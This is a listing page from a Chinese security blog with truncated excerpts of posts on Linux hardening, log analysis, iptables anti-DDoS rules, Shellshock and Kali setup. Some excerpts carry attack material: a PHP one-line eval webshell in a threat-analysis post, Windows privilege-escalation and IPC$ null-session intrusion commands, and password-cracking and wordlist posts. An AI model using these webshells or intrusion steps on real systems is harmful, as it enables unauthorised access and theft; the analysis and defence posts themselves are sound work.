当前位置: 首页 >> 安全
【拍错】Kali安装软件报错解决方法

【拍错】Kali安装软件报错解决方法

E: Failed to fetch http://mirrors.tuna.tsinghua.edu.cn/kali/dists/kali-rolling/main/Contents-amd64.gz  File has unexpected size (41938997 != 41911188). Mirror sync in progress? [IP: 101.6.15.130 80]

   Hashes of expected file:

1年前 (2022-10-17)    Jiaozn    Linux安全    2193    0    全文阅读
【威胁分析】<?php eval($_POST[‘a‘]);?>

【威胁分析】<?php eval($_POST[‘a‘]);?>

请求体解码为:

<?php eval($_POST['a']);?>

一句话木马。

eval():将括号内的字符串解析为php代码。

2年前 (2022-08-15)    Jiaozn    Web安全    920    0    全文阅读
【日志】分析Apache日志文件

【日志】分析Apache日志文件


有许多不同的软件包,可让您生成有关谁在访问您的网站以及他们在做什么的报告。目前最流行的是默认情况下在许多共享服务器上安装的“ 模拟 ”,“ Webalizer ”和“ AWStats ”。


尽管此类程序生成吸引人的报告,但它们只是从日志文件可以告诉您的内容开始。在本节中,我们研究了您可以更深入研究的方法-着重于使用简单的命令行工具,尤其是grep,awk和sed。


1.合并日志格式

以下内容假定采用Apache HTTP Server 组合日志格式,其中日志文件中的每个条目均包含以下信息:

2年前 (2022-07-01)    Jiaozn    Web安全    614    0    全文阅读
【知识】HTTP协议中的5类状态码

【知识】HTTP协议中的5类状态码

状态码用来告诉HTTP客户端,HTTP服务器是否产生了预期的Response。

HTTP/1.1协议中定义了5类状态码,状态码由三位数字组成,第一个数字定义了响应的类别。

● 1XX 提示信息——表示请求已被成功接收,继续处理。

● 2XX 成功——表示请求已被成功接收,理解,接受。

● 3XX 重定向——要完成请求必须进行更进一步的处理。

● 4XX 客户端错误——请求有语法错误或请求无法实现。

● 5XX 服务器端错误——服务器未能实现合法的请求

2年前 (2022-04-23)    Jiaozn    Web安全    883    0    全文阅读
【安全】教你如何在Linux中防止SYN Flood攻击

【安全】教你如何在Linux中防止SYN Flood攻击

 SYN泛洪攻击(SYN Flood)是指使用不完善的TCP/IP三次握手,恶意发送大量只包含SYN握手序列的数据包的攻击方法。这种攻击方法可能会导致被攻击的计算机拒绝服务甚至崩溃,从而使潜在的连接占用大量的系统资源,无法完成三次手。

2年前 (2021-10-13)    Jiaozn    Linux安全    1841    0    全文阅读
【日志】CentOS下查看最后登录的用户信息以及LOG记录

【日志】CentOS下查看最后登录的用户信息以及LOG记录

CentOS下查看最后登录的用户信息tail /var/log/messagestail /var/log/secure 我们知道,在redhat下可以用lastlog查看各用户最后登录的信息,用last可以查看指定用户的登录信息。查看用户登陆信息:last命令详解  功能说明:列出目前与过去登入系统的用户相关信息。  语  法:last [-adRx][-f <记录文件>][-n <显示列数>][帐号名称...][终端机编号...]  补充
3年前 (2021-05-03)    Jiaozn    Linux安全    1734    0    全文阅读
【设置】CentOS 7.4禁止root用户登录并添加sudo权限管理

【设置】CentOS 7.4禁止root用户登录并添加sudo权限管理

系统环境:CentOS 7.4目的:不能用root用户直接登录,使用普通用户管理服务器,然后用sudo提权进行操作。1、创建管理用户,设置密码[root@localhost ~]# useradd admin[root@localhost ~]# echo "www.yangxingzhen.com" |passwd --stdin admin2、禁止root登录#编辑/etc/ssh/sshd_config文件[root@localhost ~]# vim /etc/ssh
3年前 (2021-05-02)    Jiaozn    Linux安全    2443    0    全文阅读
【搭建】快速搭建ELK日志分析系统

【搭建】快速搭建ELK日志分析系统

一、ELK搭建篇官网地址:https://www.elastic.co/cn/官网权威指南:https://www.elastic.co/guide/cn/elasticsearch/guide/current/index.html安装指南:https://www.elastic.co/guide/en/elasticsearch/reference/5.x/rpm.htmlELK是Elasticsearch、Logstash、Kibana的简称,这三者是核心套件,但并非全部。Elasticse
3年前 (2021-04-08)    Jiaozn    Linux安全    2010    0    全文阅读
【安装】树莓派安装kali并完整配置

【安装】树莓派安装kali并完整配置

目录0X01硬件准备0X02 软件准备1.换源2.安装VNC3.设置中文4.设置日期5.设置kali空间大小6.安装完整kali7.固定IP0X01硬件准备树莓派内存卡读卡器一个屏幕,键鼠套0X02 软件准备Win32DiskImager(用于写入镜像)PuTTY (ssh连接用)Xshell 6(和PuTTY二选一就好)realvnc(vnc)下载镜像先到https://www.offensive-security.com/kali-linux-arm-images/选择树莓派并选择对应的镜像
4年前 (2019-12-27)    Jiaozn    Linux安全    2475    0    全文阅读
【解密】网页文件被加入恶意百度跳转代码

【解密】网页文件被加入恶意百度跳转代码

网站被挂恶意代码恶意代码源码是这样的:<title>&#29066;&#29483;&#25163;&#28216;&#45;&#29066;&#29483;&#25163;&#28216;&#23448;&#26041;&#32593;&#22336;</title> <meta name="keywords" cont
4年前 (2019-12-27)    Jiaozn    Web安全    3406    0    全文阅读
【安全】Web提权内网提权思路

【安全】Web提权内网提权思路

【 web提权 】1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cm
5年前 (2019-09-04)    Jiaozn    Web安全    2560    0    全文阅读
【超详细】SQLMap用户手册

【超详细】SQLMap用户手册

http://192.168.136.131/sqlmap/mysql/get_int.php?id=1当给sqlmap这么一个url的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会
5年前 (2019-08-28)    Jiaozn    Web安全    3373    1    全文阅读
【攻防】利用IPC$空连接进行入侵及防范的方法

【攻防】利用IPC$空连接进行入侵及防范的方法

首先来学习几个用到的cmd的命令。1、net use \\IP\ipc$ "" /user:"" -该命令的意思是与对方ip主机建立空连接(注意这个命令一共有4个空格哦,前后);2、net use \\IP\ipc$ "password" /user:"username" -意思是和前者相反是建立非空连接;3、net view \\IP -查看目标主机共享资源;4、net share -查看本地共享资源;5、nbts
6年前 (2018-09-05)    Jiaozn    安全    2992    0    全文阅读
【破解】如何破解工作表保护密码

【破解】如何破解工作表保护密码

excel表格格式无法修改,原因是工作表做了表保护。但是密码忘了怎么办呢,我们来破解一下。工具:office20101、打开EXCEL工作表,而后点击另存为,将表格保存为启用宏的工作表2、视图-宏-录制新宏,在弹出的对话框内修改宏名称而后确定3、视图-宏-停止录制宏,宏录制完成4、视图-宏-查看宏,在弹出的对话框找到我们刚才录制的宏,然后编辑5、代码复制到VBA编辑窗口内,替换所有内容,点击保存,退出Public Sub AllInternalPasswords() 
6年前 (2018-07-15)    Jiaozn    安全    3718    1    全文阅读
【P2P】CentOS6.4 安装ipp2p封禁BT方法

【P2P】CentOS6.4 安装ipp2p封禁BT方法

This tutorial will explain how to install aditional modules for the kernel to use with iptables rules sets (netfilter modules). Xtables-addons is the successor to patch-o-matic(-ng). Likewise, it contains extensions that were not, or are not yet, acc
8年前 (2016-05-05)    Jiaozn    Linux安全    3914    1    全文阅读
【实例】linux配置防火墙详细步骤(iptables命令使用方法)

【实例】linux配置防火墙详细步骤(iptables命令使用方法)

通过本教程操作,请确认您能使用linux本机。如果您使用的是ssh远程,而又不能直接操作本机,那么建议您慎重,慎重,再慎重!,因为拒绝命令执行以后直接就会断开ssh链接,就登不上了,只能去本地登录修改。

通过iptables我们可以为我们的Linux服务器配置有动态的防火墙,能够指定并记住为发送或接收信息包所建立的连接的状态,是一套用来设置、维护和检查Linux内核的IP包过滤规则的命令包。

8年前 (2016-03-16)    Jiaozn    Linux安全    4211    1    全文阅读
【安全】php网站安全防范(目录安全、木马防范)

【安全】php网站安全防范(目录安全、木马防范)

一、目录权限设置很重要:可以有效防范黑客上传木马文件.

如果通过 chmod 644 * -R 的话,php文件就没有权限访问了。

如果通过chmod 755 * -R 的话,php文件的权限就高了。


所以就需要分开设置目录权限和文件权限:

linux 服务器权限:经常要用到的命令:

find /path -type f -exec chmod 644 {} \; &nbs

8年前 (2016-01-25)    Jiaozn    Web安全    3394    0    全文阅读
【攻击】Nginx使用webbench进行压力测试

【攻击】Nginx使用webbench进行压力测试

  在运维工作中,压力测试是一项非常重要的工作。比如在一个网站上线之前,能承受多大访问量、在大访问量情况下性能怎样,这些数据指标好坏将会直接影响用户体验。

  但是,在压力测试中存在一个共性,那就是压力测试的结果与实际负载结果不会完全相同,就算压力测试工作做的再好,也不能保证100%和线上性能指标相同。面对这些问题,我们只能尽量去想方设法去模拟。所以,压力测试非常有必要,有了这些数据,我们就能对自己做维护的平台做到心中有数。

  目前较为常见的网站压力测试工具有we

8年前 (2016-01-14)    Jiaozn    Linux安全    3572    0    全文阅读
【防御】iptables防DDOS攻击和CC攻击设置

【防御】iptables防DDOS攻击和CC攻击设置

防范DDOS攻击脚本

#防止SYN攻击 轻量级预防 

iptables -N syn-flood 

iptables -A INPUT -p tcp --syn -j syn-flood 

iptables -I syn-flood -p tcp -m limit --limit 3/s --limit-burst 6 -j RETURN 

iptables -A syn-flood -j

9年前 (2015-10-08)    Jiaozn    Web安全    3684    0    全文阅读
【防御】Linux防DDOS和CC攻击的方法

【防御】Linux防DDOS和CC攻击的方法

     虚拟主机服务商在运营过程中可能会受到黑客攻击,常见的攻击方式有SYN,DDOS等。通过更换IP,查找被攻击的站点可能避开攻击,但是中断服务的时间比较长。比较彻底的解决方法是添置硬件防火墙。不过,硬件防火墙价格比较昂贵。可以考虑利用Linux虚拟主机服务器本身提供的防火墙功能来防御。


1. 抵御SYN

SYN攻击是利用TCP/IP协议3次握手的原理,发送大量的建立连接的网络包,但不实际建立连接,最终导致被

9年前 (2015-10-08)    Jiaozn    Web安全    4305    0    全文阅读
【安全】登陆时出现id: cannot find name for user ID 500

【安全】登陆时出现id: cannot find name for user ID 500

linux系统新建普通用户后登录系统提示如下信息:

WARNING! The remote S

9年前 (2015-09-18)    Jiaozn    Linux安全    5201    0    全文阅读
【清理】Linux下如何清除系统日志,清理垃圾

【清理】Linux下如何清除系统日志,清理垃圾

使用过Windows的人都知道,在使用windows系统的过程中系统会变得越来越慢。而对于Windows下饱受诟病的各种垃圾文件都需要自己想办法删除,不然系统将会变得越来越大,越来越迟钝!windows怎么清理垃圾相信大家都知道的,那么linux下怎么清理系统垃圾呢?

Linux的文件系统比Windows的要优秀,不会产生碎片,对于长时间运行的服务器来说尤为重要,而且Linux系统本身也不会像Windows一样产生大量的垃圾文件。不知道这个说法有没有可信度!至少我们可以确定的是

9年前 (2015-09-18)    Jiaozn    Linux安全    5329    0    全文阅读
【WEB】http 错误代码大全 200,404,503等

【WEB】http 错误代码大全 200,404,503等

常见的状态码为:

200 - 服务器成功返回网页

404 - 请求的网页不存在

503 - 服务不可用


===============================

详细分解:

1xx(临时响应)

表示临时响应并需要请求者继续执行操作的状态代码。


代码 说明

100 (继续) 请求者应当继续提出请求。服务器返回此代

9年前 (2015-08-05)    Jiaozn    Web安全    3345    0    全文阅读
【安全】Windows Server2003系统安全设置

【安全】Windows Server2003系统安全设置

一、 系统的安装

1、按照Windows2003安装光盘的提示安装,默认情况下2003没有把IIS6.0安装在系统里面。

2、IIS6.0的安装

9年前 (2015-07-14)    Jiaozn    安全    4669    0    全文阅读
【安全】Apache安全配置

【安全】Apache安全配置

1 安全策略


1.1 安全目录


.htaccess做目录安全保护的,欲读取这保护的目录需要先键入正确用户帐号与密码。这样可做为专门管理网

9年前 (2015-06-09)    Jiaozn    Web安全    3967    0    全文阅读
【linux】kali linux安装到u盘,一个随身携带的kali

【linux】kali linux安装到u盘,一个随身携带的kali

从U盘启动然后安装Kali是我们最喜欢并且是运行Kali最快(容易)的方法.为此,我们首先要把Kali的ISO克隆到U盘.如果你经常使用Kali Linux U盘,请在克隆前阅读完整的文档.

10年前 (2014-10-17)    Jiaozn    Linux安全    22158    2    全文阅读
【经验】ecshop引起的系统检查问题解决

【经验】ecshop引起的系统检查问题解决

在运维ecshop商城时候,点击编辑商品信息后,页面出现乱码,并且有报错信息:

Warning: SELECT b.*,type_id FROM sdb_brand b LEFT JOIN sdb_type_brand t ON b.brand_id = t.brand_i
10年前 (2014-09-28)    Jiaozn    Linux安全    4488    0    全文阅读
【安全】CVE-2014-6271 bash远程命令执行漏洞测试方法原理

【安全】CVE-2014-6271 bash远程命令执行漏洞测试方法原理

爆出CVE-2014-6271 bash远程命令执行漏洞。bash是Linux用户广泛使用的一款用于控制命令提示符工具,导致该漏洞影响范围甚广。同时,当HTTP服务开放CGI服务或其他地方引用bash时可直接导致远程命令执行漏洞。主要影响系统为ubuntu centos debian suse readhat等主流linux操作系统。漏洞危害主要表现在:影响基于bash开放的服务、程序。当网站利用CGI执行bash后可导致攻击者远程执行系统命令,从而可以利用系统命令反弹shell之后进行内网渗透、挂马、篡改主页、脱库等行为。

10年前 (2014-09-28)    Jiaozn    Linux安全    4367    0    全文阅读
【安全】Linux Bash严重漏洞紧急修复方法

【安全】Linux Bash严重漏洞紧急修复方法

日前Linux官方内置Bash中新发现一个非常严重安全漏洞(漏洞参考https://access.redhat.com/security/cve/CVE-2014-6271 ),黑客可以利用该Bash漏洞完全控制目标系统并发起攻击,为了避免您Linux服务器受影响,建议您尽快完成漏洞修补

10年前 (2014-09-27)    Jiaozn    Linux安全    4582    0    全文阅读
【字典】500W常用密码字典分享,最常用弱口令密码排行

【字典】500W常用密码字典分享,最常用弱口令密码排行

500W常用密码字典分享,互联网时代,到处都需要密码,有多少人使用同样的密码,有多少人使用强密码,有多少密码惨遭暴力破解

弱口令,若口令,网银,帐号,资金安全……

好奇的童鞋可以下载看看,自己的密码是否在其中,尽快更换密码吧

10年前 (2014-07-18)    Jiaozn    社工    41218    0    全文阅读

分享:

支付宝

微信